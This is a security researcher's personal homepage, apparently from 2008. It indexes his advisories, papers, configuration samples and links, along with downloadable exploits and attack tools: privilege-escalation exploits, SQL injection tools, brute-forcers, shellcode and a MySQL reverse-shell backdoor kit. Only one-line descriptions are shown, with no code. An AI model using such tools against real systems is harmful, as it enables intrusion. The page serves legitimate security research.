0xdeadbeef dot info | raptor's labs

0xdeadbeef dot info.

Choose Windows. Choose the eXPerience.
Choose flashy menus on your fucking server.
Choose Exchange. Choose IIS.
Choose Code Red, Nimda, the Lovebug, and a sexy Melissa...
Choose Outlook and end up wondering where your stupid .docs are.
Choose not to choose. Let Micro$oft do it for you.

But why would I want to do a thing like that?

I choose not to be chosen: I choose something else.
The reasons? There are too many reasons.
And who needs reasons when you've got Linux?

(from http://p.ulh.as/)

fnord.

[0x01] Who's Raptor?

Welcome to my personal Internet homepage and playground. Even if I'm a busy guy, I try to keep it as up to date as possible: take a look below for the (new) stuff. Send feedback to: Marco Ivaldi <raptor[at]0xdeadbeef.info> (PGP key).

	"Software is like sex. It's better when it's free." -- Linus Torvalds
	"A chain is only as strong as its weakest link." -- Charles A. Lindberg
	"I have seen the fnords." -- Historical graffiti on Anarchy Bridge, UK
	"Testing can prove the presence of bugs, but not their absence." -- E. Dijkstra
	"Hi, my name is Pete and I'm an OSSTMM user." -- Pete Herzog
	"The GNU people aren't evil." -- /usr/src/linux/Documentation/CodingStyle
	"There are always errors in real data." -- The AWK Programming Language
	"When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl." -- Anonymous

I'm a computer security researcher and consultant, a software developer, and a UNIX system administrator. My particular interests are networking (from old-style X.25 packet switched networks to modern SAT links), telephony (fixed, mobile, and VoIP), and cryptology.

I'm currently employed as Red Team Coordinator at @ Mediaservice.net, a leading information security company based in Italy: my daily tasks include advanced penetration testing, ISMS deployment and audit, vulnerability research and exploit development. I hold the OPST certification.

I'm also a technical writer: my articles are published on various computing magazines. I'm founder and editorial board member of Linux&C (the first italian magazine about Linux and open-source), Linux Pratico, and H&C. Finally, I write for some web portals about hacking, security, and privacy in the digital age.

I'm an OpenBSD and FreeBSD aficionado. When I have to use Linux, I choose my first love Slackware.

[0x02] Projects.

Here's the list of my current projects related to computing and information security.

Antifork Research. I'm one of the founders of the project (formerly known as disLESSici team).
Blackhats.it. This is the old site of the ITBH security research community (now closed).
TSTF. I'm member of the Telecom Security Task Force, involved in telco-related research.
OSSTMM. I'm an active contributor and supporter of the Open Source Security Testing Methodology.
Lab @ Media. This is the on-line repository of research projects sponsored by my employer.
CrISTAL. I'm involved in the Critical Infrastructures Security Test & Analysis Lab (SCADA).
Opensource. I'm the mantainer of the official italian WWW mirror of the Open Source Initiative (OSI).
OpenBSD. My employer is currently hosting the italian WWW mirror of the OpenBSD project.

[0x04] Papers.

This is a collection of miscellaneous research papers, presentations, and advisories I've written or reviewed. Some documents are in italian: maybe I'll bother to translate them to english in the future. Alternative places where to find other papers of mine released into the public domain are bugtraq (the first public computer security vulnerability mailing list), vuln-dev (an exploit development mailing list), pen-test (a penetration testing and network auditing mailing list), full-disclosure (an unmoderated high-traffic list for disclosure of security information), and sikurezza.org (the first italian computer security mailing list) archives, along with other similar security resources on the Internet (see also the Links section below) and of course the magazines I write for.

Articles and Books.

L'anonimato su Internet. About anonymity and privacy on the Internet, appeared on Apogeonline on 19/01/2000.
Qualcuno ci ascolta. About the ECHELON network (written in January 2000, not published elsewhere).
Introduzione al Quantum Computing. Introduction to QC, also released as an Apogeonline ebook in July 2002.
L'arte dell'hacking. I did the technical review of the translation of Hacking: the art of exploitation, by J. Erickson.
Vulnerabilita' su Linux. I wrote the foreword for this practical exploitation guide by Enrico Feresin.
Stealing Minutes. Newsweek International reporter Benjamin Sutherland interviewed me for this article on VoIP.
Hacking Exposed Linux. I wrote the VoIP chapter for the third edition of the HEL book, released by ISECOM.

Whitepapers and Presentations.

Intrusioni di rete. Slides compiled for an Information Security Master in Milan University (14/12/2001).
Sicurezza su reti X.25. Written for Blackhats.it and released to the public in September 2002.
Buffer Overflow in passwd(1). This whitepaper was written by Shaun McAdams for his GIAC GCIH practical.
Whoppix-raptor. A flash demo showing raptor_chown.c in action done for whoppix.net by ports@portsonline.net.

Advisories.

CVE-2003-0190. I discovered and published this OpenSSH/PAM Delay Information Disclosure Vulnerability.
CVE-2006-1242. I discovered and published this Linux Kernel IP ID Information Disclosure Weakness.
CVE-2006-5229. I discovered and published yet another OpenSSH information disclosure via timing leak.

[0x08] Exploits.

Here you can download some of the exploits and proof-of-concept code I've developed during my vulnerability research activities on multiple platforms. For educational purposes only, standard disclaimer applies.

Linux.

raptor_chown.c. Linux 2.6.x < 2.6.7-rc3 (CVE-2004-0497). Missing DAC controls in sys_chown() on Linux.
raptor_prctl.c. Linux 2.6.x from 2.6.13 up to versions before 2.6.17.4 (CVE-2006-2451). Suid_dumpable bug.
raptor_prctl2.c. Linux 2.6.x from 2.6.13 up to versions before 2.6.17.4 (CVE-2006-2451). Via logrotate(8).
raptor_truecrypt.tgz. TrueCrypt <= 4.3 (CVE-2007-1738). Local privilege escalation via setuid volume mount.

Solaris/x86.

raptor_ucbps. Solaris 8, 9 (CVE-1999-1587). Information leak with /usr/ucb/ps on both SPARC and x86.
raptor_sysinfo.c. Solaris 10 (CVE-2006-3824). Kernel memory disclosure with the sysinfo(2) system call.
raptor_libnspr. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation oldschool local root.
raptor_libnspr2. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation local root via LD_PRELOAD.
raptor_libnspr3. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation local root via constructor.
raptor_peek.c. Solaris 8, 9, 10 (CVE-2007-5225). Kernel memory disclosure with fifofs I_PEEK ioctl(2).

Solaris/SPARC.

raptor_ucbps. Solaris 8, 9 (CVE-1999-1587). Information leak with /usr/ucb/ps on both SPARC and x86.
raptor_rlogin.c. Solaris 2.5.1, 2.6, 7, 8 (CVE-2001-0797). Buffer overflow in System V login via rlogin vector.
raptor_ldpreload.c. Solaris 2.6, 7, 8, 9 (CVE-2003-0609). Stack-based buffer overflow in the runtime linker ld.so.1.
raptor_libdthelp.c. Solaris 7, 8, 9 (CVE-2003-0834). Buffer overflow in CDE libDtHelp via dtprintinfo help feature.
raptor_libdthelp2.c. Solaris 7, 8, 9 (CVE-2003-0834). Buffer overflow in CDE libDtHelp, non-exec stack version.
raptor_passwd.c. Solaris 8, 9 (CVE-2004-0360). Stack-based buffer overflow in the circ() function of passwd(1).
raptor_sysinfo.c. Solaris 10 (CVE-2006-3824). Kernel memory disclosure with the sysinfo(2) system call.
raptor_xkb.c. Solaris 8, 9, 10 (CVE-2006-4655). Buffer overflow in the Strcmp() function of X11 XKEYBOARD.
raptor_libnspr. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation oldschool local root.
raptor_libnspr2. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation local root via LD_PRELOAD.
raptor_libnspr3. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation local root via constructor.
raptor_peek.c. Solaris 8, 9, 10 (CVE-2007-5225). Kernel memory disclosure with fifofs I_PEEK ioctl(2).

Oracle.

raptor_oraextproc.sql. Oracle 9i, 10g (CVE-2004-1364). Directory traversal vulnerability in extproc.
raptor_oraexec.sql. Exploitation suite for Oracle written in Java, to read/write files and execute OS commands.
raptor_orafile.sql. File system access suite for Oracle based on the utl_file package, to read/write files.

MySQL.

raptor_udf.c. Helper dynamic library for local privilege escalation through MySQL run with root privileges.
raptor_udf2.c. Slight modification of raptor_udf.c, it works with recent versions of the open-source database.
raptor_winudf.tgz. MySQL reverse shell and command execution UDFs backdoor kit for M$ Windows.

Misc.

raptor_sshtime. OpenSSH (CVE-2003-0190, CVE-2006-5229). Remote timing attack information leak exploit.
raptor_dominohash. Lotus Domino R5, R6 (CVE-2005-2428). Webmail names.nsf password hash dumper.

[0x10] Code.

This section is dedicated to my code: you can download and test some of the programs I've coded in the past or I'm developing right now. Please note that most of this stuff is experimental and/or in alpha release: some programs are simply coding exercises or bugfixes of old legacy code. Standard disclaimer applies.

New School.

mssql-hax0r. Multi-purpose SQL injection attack tool for advanced Microsoft SQL Server exploitation.
samba-hax0r. Multi-purpose attack tool for SMB/CIFS network protocols exploitation.
havoc-0.1d.tgz. Random ARP traffic generator, BOFH style. It can temporarily hose an ethernet segment.
ikenum. Script for remote enumeration of supported ISAKMP authentication methods (RFC 2409).
oracrack. Oracle database password cracking helper, to be used with the checkpwd cracker.
orabackdoor.sql. Proof-of-concept code to demonstrate how to write a simple backdoor for Oracle.
scan-tools.tgz. A collection of easily customizable bash scripts for network scanning purposes.
sequel.tgz. A growing collection of simple scripts for performing multiple tasks via SQL injection attacks.

Old School.

brutus.pl. Remote login/password bruteforce cracker for TELNET, FTP, POP3, SMTP, and HTTP protocols.
ward.c. Fast wardialer for UNIX systems, it scans a list of phone numbers hunting for active modems.
rasbrute.bat. Very basic and easily customizable DOS batch script for remote bruteforcing of M$ PPTP.
x25-tools.tgz (new). A collection of multi-purpose X.25 scanners based on vudu, including nuascan and cudscan.
psibrute.com. This DCL script abuses the old PSI_MAIL trick on VMS/OpenVMS to remotely find valid users.
backdoor.bas. Simple VMS/OpenVMS lib$spawn() setuid-like backdoor (easily portable to other languages).
autoscan.pl. Autonet NUA scanner for the old autonet x25pad gateway, based on the brutus.pl engine.

Exploitation.

abo-exploits.tgz. Advanced buffer overflows study. See gera's vulnerable code exploited in different ways.
fs-exploits.tgz. Format strings exploitation study. Commented solutions to gera's fs vulnerable code series.
vulndev-exploits.tgz. Exploit code for vuln-dev challenges. Currently, there are 2 accomplished challenges.
linux-x86-exploits.tgz. Linux/x86 vulnerable code study. Currently, there are 86 example exploits included.
solaris-sparc-exploits.tgz. Solaris/SPARC vulnerable code study. Currently, there are 19 example exploits.

Shellcode.

setuid-linux.c. Short (30 bytes) shellcode for Linux/x86, executing a setuid(0) and an execve() of /bin/sh.
gets-linux.c. Linux/x86 shellcode for stdin re-open and /bin/sh exec. Useful to exploit some gets() overflows.
reusage-linux.c. Linux/x86 shellcode for /bin/sh string re-usage from vulnerable program (16 bytes only).
portbind-linux.c. Simple Linux/x86 portbind shellcode, spawning a setuid(0) shell on port 31337/tcp (96 bytes).
setuid-bsd.c. Short (31 bytes) shellcode for BSD/x86, executing an execve() of /bin/sh after a setuid(0).
portbind-bsd.c. Simple BSD/x86 portbind shellcode, spawning a setuid(0) shell on port 31337/tcp (94 bytes).
raptorcode.c. Another shellcode for Linux/x86 that prints "Raptor owns your safe\n" on your current tty.
leetcode.c. Another setuid(0)/execve() shellcode for BSD/x86, with a nice ascii message buried into it.

Esoteric.

poly.txt. A polyglot, a program that may be compiled in more than one language (in this case C and Perl).
poly2.txt. Another simple polyglot. This particular one is interpreted both as a C program or BASH script.
poly3.txt. A third polyglot. This program works under cc, sh, and csh (polyglot^3).
poly4.txt. Another small polyglot for cc, perl, sh, and csh (the almost done awk porting is welcome).

Misc.

pfilter.pl. OpenBSD PF log file filter (parser and colorizer). It supports both /var/log/pflog and pflog0.
snortctl.tgz. Management script and log parser/colorizer for Snort NIDS, from the early stages of @Aenigma.
libc-search.c. Quick and easily-adaptable libc symbol/pattern search helper. Tested on Linux.
cidr.c. Quick parser for Classless Inter Domain Routing (CIDR). It generates an IP address list from ip/cidr.
bounce.c. Simple netcat-like bouncer client that pipes on localhost an active TCP session.
p2s.c. Prism2stumbler is a wireless network stumbler for PRISM2 cards. Tested on Linux with wlan-ng.
ftw.pl. FTP-to-WEB Gateway. HTTP interface to an FTP tree, formerly used on Antifork Research archive.

[0x20] Configuration.

This section contains some example configuration files and templates for common security solutions such as Packet Filters, Virtual Private Networks, and Intrusion Detection Systems, along with OpenBSD and Linux kernel setups i compiled for my notebook computers. YMMV.

Packet Filters.

pf.conf.39. Sample PF/NAT ruleset for the configuration of a basic OpenBSD 3.9 stateful firewall.
pf.conf.39.adsl. Another sample PF/NAT ruleset for an OpenBSD 3.9 stateful firewall optimized for ADSL.
pf.conf.39.dmz. Sample PF/NAT ruleset for an OpenBSD 3.9 stateful firewall with bridged DMZ on 3rd NIC.
rc.iptables v1. Sample basic ruleset for the configuration of a Linux 2.4 stateful firewall (host fw + vpn).
rc.iptables v2. Sample basic ruleset for the configuration of a Linux 2.4 stateful firewall (masq fw + vpn).
ipf.rules v1. Sample rules for the IPFilter stateful firewall, with detailed comments. Tested on OpenBSD 2.9.
ipnat.rules v1. Sample rules for the configuration of IPFilter NAT and Proxies. Tested on OpenBSD 2.9.
ipf.rules v2. Another sample ruleset for IPFilter (DMZ with a 3-NIC firewall). Tested on OpenBSD 2.9.
ipnat.rules v2. Sample ruleset for IPNat, needed to deploy ipf.rules v2 above. Tested on OpenBSD 2.9.

Virtual Private Networks.

isakmpd.policy v1. Sample IKE policy file for a basic IPsec VPN. Tested on OpenBSD 2.9.
isakmpd.conf.1 v1. Sample IKE configuration file for a basic IPsec VPN (#1). Tested on OpenBSD 2.9.
isakmpd.conf.2 v1. Sample IKE configuration file for a basic IPsec VPN (#2). Tested on OpenBSD 2.9.
isakmpd.policy v2. IKE policy file for a basic IPsec VPN using X.509 certs. Tested on OpenBSD 3.2.
isakmpd.conf.1 v2. IKE config file for a basic IPsec VPN using X.509 certs (#1). Tested on OpenBSD 3.2.
isakmpd.conf.2 v2. IKE config file for a basic IPsec VPN using X.509 certs (#2). Tested on OpenBSD 3.2.
isakmpd.policy v3. Another IKE policy file for a road warrior IPsec VPN. Tested on OpenBSD 3.2.
isakmpd.conf.1 v3. Another IKE config file for a road warrior IPsec VPN (server). Tested on OpenBSD 3.2.
isakmpd.conf.2 v3. Another IKE config file for a road warrior IPsec VPN (client). Tested on OpenBSD 3.2.

Intrusion Detection Systems.

snort.conf v1.9.0. Sample configuration file for the Network Intrusion Detection System (NIDS) Snort 1.9.0.
snort.conf v2.0.0. Sample configuration file for the Network Intrusion Detection System (NIDS) Snort 2.0.0.

Operating System Kernels.

voodoo. OpenBSD 3.5 kernel configuration for my old and glorious Acer TravelMate 345T notebook.
shaolin. Linux 2.6.21.5 kernel configuration for my brand new ASUS U5F notebook (minimal setup).

[0x40] Cool stuff.

First of all, read the BOFH stories by Simon Travaglia, and remember that in disk space, nobody can hear your files scream! I've also written a small CGI script that generates a random "excuse of the day". Dummy mode is forever, enjoy the mighty Bastard Operator From Hell... Also in his new home! Other cool stuff follows here.

Linux Penguin. A cool HTML artwork representing Tux, the Linux Penguin (257 x 303 @ 250 colors).
OpenBSD Devil. Another extremely cool HTML artwork, portrait of the OpenBSD Devil mascotte.
RTFM. Hey, you! Yeah, you! Don't ask stupid questions, always Read The Fucking Manual before.
Utah Bengaled Raptor. An impressive 8 foot tall, 1 ton wooden prehistoric monster, created by artist Matt Kron.
0xdefaced. This is the archived 0xdeadbeef dot info defacement hoax made for April Fools' Day 2004.
HP JetDirect Crash. Cool stack dump printed on paper by my HP JetDirect printer after a Denial of Service.
Insert Coin. My kinda original HP JetDirect printer's new display (yeah, I was bored that day).
Control Room. ITAPAC (DNIC 2222) is the most known italian X.25 network, still alive as of 2006.
Vi Assistant. Fear the infamous clippy-like assistant for vim. Resistance is futile, you'll be assimilated.
Sidecar Wardriving. Funny picture of a l33t wardriving session on an original Ural sidecar.
Pen-test Moderation. Cheap viagra spam and SecurityFocus "penetration" test mailing list moderation fun.

[0x80] Useful (maybe) links.

Finally, the Internet links section. I try to keep it short and as up to date as possible...

Security.

SecTools. Homepage of the Top 100 Network Security Tools list as surveyed by Fyodor.
SecLists. Web archives updated in real-time for many full-disclosure mailing lists.
Milw0rm. A well-mantained and up-to-date exploit collection for various operating systems.
Pen-test Directory. An attempt to build an organized directory strictly related to the pen-test business.
Pen-test Framework. Penetration testing framework mindmap, by Toggmeister and Lee J Lawson.
OWASP. The Open Web Application Security Project: useful information on web application security.
Database Security. The web's leading resource for database security: very interesting information.
Hacking AS/400. Homepage of the Hacking iSeries book, free information about AS/400 security.

Coding.

IOCCC. The International Obfuscated C Code Contest homepage. Voodoo magic.
Insecure Programming. A nice collection of insecure code for didactical purposes, by gera.
The Dude. A debugger which resides in kernel memory and provides an alternative to ptrace(2).
RR0D. Rasta Ring 0 Debugger, a powerful OS-independent debugger by Droids Corporation.
Boomerang. An attempt at a general, open-source, retargetable decompiler of binary files.
CC65. CC65 is a freeware C compiler for 6502 based systems (Commodore, Apple, Atari).
Brainfuck. Brainfuck is an 8-instruction Turing-complete programming language.
PROTOS. Project aimed at verifying implementations of protocols using black-box testing methods.

Crypto and Privacy.

Cryptome. Probably the best cryptography and digital privacy resource on the Internet.
P. Gutmann. Peter Gutmann's homepage, research from a professional paranoid.
Crypto. Matt Blaze's cryptography resource on the web: very interesting papers.
GnuPG. The GNU Privacy Guard, an extremely popular free OpenPGP implementation.
TrueCrypt. Free open-source disk encryption software for both Windows and Linux.
Tor. An anonymous Internet communication system for TCP-based applications.
Rainbow Crack. General purpose implementation of faster time-memory trade-off technique.
BugMeNot. Useful service to find and share logins for web sites that force you to register.

Telephony.

Wardialing. A comprehensive collection of wardialing software for UNIX, MS-DOS, and Windows.
Tactical VoIP. Hardcore VoIP security, distributing the Tactical VoIP Toolkit and VoIPy tools.
VOIPSA. The Voice over IP Security Alliance aims to fill the void of VoIP security related resources.
The GSM Software Project. New exciting THC project, aimed at building a GSM receiver.
Asterisk. An open-source PBX (Private Branch eXchange) based on the Linux OS.
IPTel. The on-line reference for Internet telephony, home of the SIP Express Router project.
Dex Page. Here you can download some useful telephony programs, like SimScan.
SIM-EMU. SIM card emulator, a nice toy for playing with cellular phones and networks.

$Id: index.html,v 1.529 2008/07/30 14:34:11 raptor Exp $